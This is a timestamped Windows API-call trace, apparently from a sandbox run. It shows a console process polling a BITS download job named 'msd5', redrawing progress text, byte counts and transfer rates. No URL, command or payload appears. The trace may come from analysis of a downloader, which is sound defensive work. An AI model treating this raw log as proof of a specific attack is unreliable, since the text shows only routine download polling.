[0068.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0068.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0x5) returned 1
[0068.964] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e364 | out: lpConsoleScreenBufferInfo=0x8e364) returned 1
[0068.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8e37c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e37c*=0x7) returned 1
[0068.964] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e358 | out: lpConsoleScreenBufferInfo=0x8e358) returned 1
[0068.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e370, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e370*=0x8) returned 1
[0068.965] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.965] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e360 | out: lpConsoleScreenBufferInfo=0x8e360) returned 1
[0068.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e378, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e378*=0x8) returned 1
[0068.965] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.965] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e354 | out: lpConsoleScreenBufferInfo=0x8e354) returned 1
[0068.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x8e36c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e36c*=0xc) returned 1
[0068.966] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e364 | out: lpConsoleScreenBufferInfo=0x8e364) returned 1
[0068.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8e37c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e37c*=0xa) returned 1
[0068.966] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.966] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e34c | out: lpConsoleScreenBufferInfo=0x8e34c) returned 1
[0068.967] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8e364, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e364*=0xa) returned 1
[0068.967] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.967] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e354 | out: lpConsoleScreenBufferInfo=0x8e354) returned 1
[0068.967] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e36c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e36c*=0x8) returned 1
[0068.967] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.967] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e378 | out: _Buffer="0") returned 1
[0068.968] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e384 | out: _Buffer="1") returned 1
[0068.968] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e354 | out: lpConsoleScreenBufferInfo=0x8e354) returned 1
[0068.968] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8e36c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e36c*=0x5) returned 1
[0068.968] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.968] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0068.968] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0x8) returned 1
[0068.968] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.969] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e380 | out: _Buffer="0") returned 1
[0068.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8e374 | out: lpSystemTimeAsFileTime=0x8e374*(dwLowDateTime=0xd9b80070, dwHighDateTime=0x1d469c7))
[0068.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8e36c | out: lpSystemTimeAsFileTime=0x8e36c*(dwLowDateTime=0xd9b80070, dwHighDateTime=0x1d469c7))
[0068.969] _finite (_X=0x0) returned 0
[0068.969] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e32c | out: lpConsoleScreenBufferInfo=0x8e32c) returned 1
[0068.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x8e344, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e344*=0xd) returned 1
[0068.969] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.969] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e338 | out: lpConsoleScreenBufferInfo=0x8e338) returned 1
[0068.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8e350, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e350*=0xf) returned 1
[0068.970] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.970] _vsnwprintf (in: _Buffer=0x8e164, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x8e128 | out: _Buffer="0.00 B/S") returned 8
[0068.970] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e37c | out: lpConsoleScreenBufferInfo=0x8e37c) returned 1
[0068.970] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e394, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e394*=0x8) returned 1
[0068.970] CoTaskMemFree (pv=0x1f8370)
[0068.970] IBackgroundCopyJob:GetType (in: This=0x1ea614, pVal=0x8f450 | out: pVal=0x8f450) returned 0x0
[0068.971] IBackgroundCopyJob:GetProgress (in: This=0x1ea614, pVal=0x200c98 | out: pVal=0x200c98) returned 0x0
[0068.972] IBackgroundCopyJob:GetPriority (in: This=0x1ea614, pVal=0x8f44c | out: pVal=0x8f44c) returned 0x0
[0068.972] CoTaskMemFree (pv=0x0)
[0068.972] IBackgroundCopyJob:GetDisplayName (in: This=0x1ea614, pVal=0x8f464 | out: pVal=0x8f464*="msd5") returned 0x0
[0068.973] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f40c | out: lpConsoleScreenBufferInfo=0x8f40c) returned 1
[0068.973] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8f424 | out: lpNumberOfCharsWritten=0x8f424) returned 1
[0068.973] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8f424 | out: lpNumberOfAttrsWritten=0x8f424) returned 1
[0068.974] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0068.974] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.974] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f8 | out: lpConsoleScreenBufferInfo=0x8f3f8) returned 1
[0068.974] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8f410, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f410*=0xa) returned 1
[0068.974] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.975] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f4 | out: lpConsoleScreenBufferInfo=0x8f3f4) returned 1
[0068.975] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8f40c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f40c*=0x5) returned 1
[0068.975] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.975] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3fc | out: lpConsoleScreenBufferInfo=0x8f3fc) returned 1
[0068.975] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8f414, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f414*=0x7) returned 1
[0068.975] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.976] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f0 | out: lpConsoleScreenBufferInfo=0x8f3f0) returned 1
[0068.976] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f408, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f408*=0x8) returned 1
[0068.976] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.976] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f8 | out: lpConsoleScreenBufferInfo=0x8f3f8) returned 1
[0068.976] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f410, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f410*=0x8) returned 1
[0068.976] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.977] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3ec | out: lpConsoleScreenBufferInfo=0x8f3ec) returned 1
[0068.977] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x8f404, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f404*=0xc) returned 1
[0068.977] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.977] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3fc | out: lpConsoleScreenBufferInfo=0x8f3fc) returned 1
[0068.977] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8f414, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f414*=0xa) returned 1
[0068.977] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3e4 | out: lpConsoleScreenBufferInfo=0x8f3e4) returned 1
[0068.978] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8f3fc, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f3fc*=0xa) returned 1
[0068.978] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3ec | out: lpConsoleScreenBufferInfo=0x8f3ec) returned 1
[0068.978] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f404, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f404*=0x8) returned 1
[0068.978] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.979] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f410 | out: _Buffer="0") returned 1
[0068.979] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f41c | out: _Buffer="1") returned 1
[0068.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3ec | out: lpConsoleScreenBufferInfo=0x8f3ec) returned 1
[0068.979] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8f404, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f404*=0x5) returned 1
[0068.979] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f4 | out: lpConsoleScreenBufferInfo=0x8f3f4) returned 1
[0068.979] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f40c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f40c*=0x8) returned 1
[0068.980] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.980] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f418 | out: _Buffer="0") returned 1
[0068.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8f404 | out: lpSystemTimeAsFileTime=0x8f404*(dwLowDateTime=0xd9ba61d0, dwHighDateTime=0x1d469c7))
[0068.980] _finite (_X=0x0) returned 1
[0068.980] _finite (_X=0x0) returned 1
[0068.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3c4 | out: lpConsoleScreenBufferInfo=0x8f3c4) returned 1
[0068.980] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x8f3dc, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f3dc*=0xd) returned 1
[0068.980] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0068.981] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3d0 | out: lpConsoleScreenBufferInfo=0x8f3d0) returned 1
[0068.981] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8f3e8, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f3e8*=0xf) returned 1
[0068.981] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0068.981] _vsnwprintf (in: _Buffer=0x8f1fc, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x8f1c0 | out: _Buffer="0.00 B/S") returned 8
[0068.981] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f414 | out: lpConsoleScreenBufferInfo=0x8f414) returned 1
[0068.981] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f42c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f42c*=0x8) returned 1
[0068.982] CoTaskMemFree (pv=0x1f8370)
[0068.982] PeekMessageW (in: lpMsg=0x8fd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8fd88) returned 0
[0068.982] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8fdb0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0069.083] PeekMessageW (in: lpMsg=0x8fd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8fd88) returned 1
[0069.083] TranslateMessage (lpMsg=0x8fd88) returned 0
[0069.083] DispatchMessageW (lpMsg=0x8fd88) returned 0x1
[0069.083] IBackgroundCopyCallback:JobModification (This=0x200c88, pJob=0x1ea6a4, dwReserved=0x0) returned 0x0
[0069.083] IBackgroundCopyJob:GetState (in: This=0x1ea614, pVal=0x200c94 | out: pVal=0x200c94) returned 0x0
[0069.087] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc2
[0069.087] IBackgroundCopyJob:GetType (in: This=0x1ea614, pVal=0x8f450 | out: pVal=0x8f450) returned 0x0
[0069.088] IBackgroundCopyCallback:JobModification (This=0x200c88, pJob=0x1ea6a4, dwReserved=0x0) returned 0x0
[0069.088] IBackgroundCopyJob:GetState (in: This=0x1ea614, pVal=0x200c94 | out: pVal=0x200c94) returned 0x0
[0069.089] IBackgroundCopyJob:GetProgress (in: This=0x1ea614, pVal=0x200c98 | out: pVal=0x200c98) returned 0x0
[0069.090] IBackgroundCopyJob:GetPriority (in: This=0x1ea614, pVal=0x8f44c | out: pVal=0x8f44c) returned 0x0
[0069.091] CoTaskMemFree (pv=0x0)
[0069.091] IBackgroundCopyJob:GetDisplayName (in: This=0x1ea614, pVal=0x8f464 | out: pVal=0x8f464*="msd5") returned 0x0
[0069.092] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f40c | out: lpConsoleScreenBufferInfo=0x8f40c) returned 1
[0069.092] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8f424 | out: lpNumberOfCharsWritten=0x8f424) returned 1
[0069.092] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8f424 | out: lpNumberOfAttrsWritten=0x8f424) returned 1
[0069.092] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0069.093] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f8 | out: lpConsoleScreenBufferInfo=0x8f3f8) returned 1
[0069.093] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8f410, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f410*=0xa) returned 1
[0069.093] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f4 | out: lpConsoleScreenBufferInfo=0x8f3f4) returned 1
[0069.094] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8f40c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f40c*=0x5) returned 1
[0069.094] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3fc | out: lpConsoleScreenBufferInfo=0x8f3fc) returned 1
[0069.094] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8f414, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f414*=0x7) returned 1
[0069.095] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f0 | out: lpConsoleScreenBufferInfo=0x8f3f0) returned 1
[0069.095] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f408, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f408*=0x8) returned 1
[0069.095] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f8 | out: lpConsoleScreenBufferInfo=0x8f3f8) returned 1
[0069.096] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f410, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f410*=0x8) returned 1
[0069.096] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3ec | out: lpConsoleScreenBufferInfo=0x8f3ec) returned 1
[0069.096] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x8f404, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f404*=0xc) returned 1
[0069.097] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3fc | out: lpConsoleScreenBufferInfo=0x8f3fc) returned 1
[0069.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8f414, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f414*=0xa) returned 1
[0069.097] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3e4 | out: lpConsoleScreenBufferInfo=0x8f3e4) returned 1
[0069.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8f3fc, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f3fc*=0xa) returned 1
[0069.098] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3ec | out: lpConsoleScreenBufferInfo=0x8f3ec) returned 1
[0069.098] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f404, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f404*=0x8) returned 1
[0069.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.099] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f410 | out: _Buffer="0") returned 1
[0069.099] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f41c | out: _Buffer="1") returned 1
[0069.099] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3ec | out: lpConsoleScreenBufferInfo=0x8f3ec) returned 1
[0069.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8f404, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f404*=0x5) returned 1
[0069.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3f4 | out: lpConsoleScreenBufferInfo=0x8f3f4) returned 1
[0069.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f40c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f40c*=0x8) returned 1
[0069.100] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.100] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f418 | out: _Buffer="0") returned 1
[0069.100] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f41c | out: _Buffer="156672") returned 6
[0069.101] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8f418 | out: _Buffer="0") returned 1
[0069.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8f404 | out: lpSystemTimeAsFileTime=0x8f404*(dwLowDateTime=0xd9cb0b70, dwHighDateTime=0x1d469c7))
[0069.101] _finite (_X=0x0) returned 1
[0069.101] _finite (_X=0x0) returned 1
[0069.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3c4 | out: lpConsoleScreenBufferInfo=0x8f3c4) returned 1
[0069.101] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x8f3dc, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f3dc*=0x11) returned 1
[0069.101] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f3d0 | out: lpConsoleScreenBufferInfo=0x8f3d0) returned 1
[0069.105] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8f3e8, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f3e8*=0xf) returned 1
[0069.105] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.105] _vsnwprintf (in: _Buffer=0x8f1fc, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x8f1c0 | out: _Buffer="0.00 B/S") returned 8
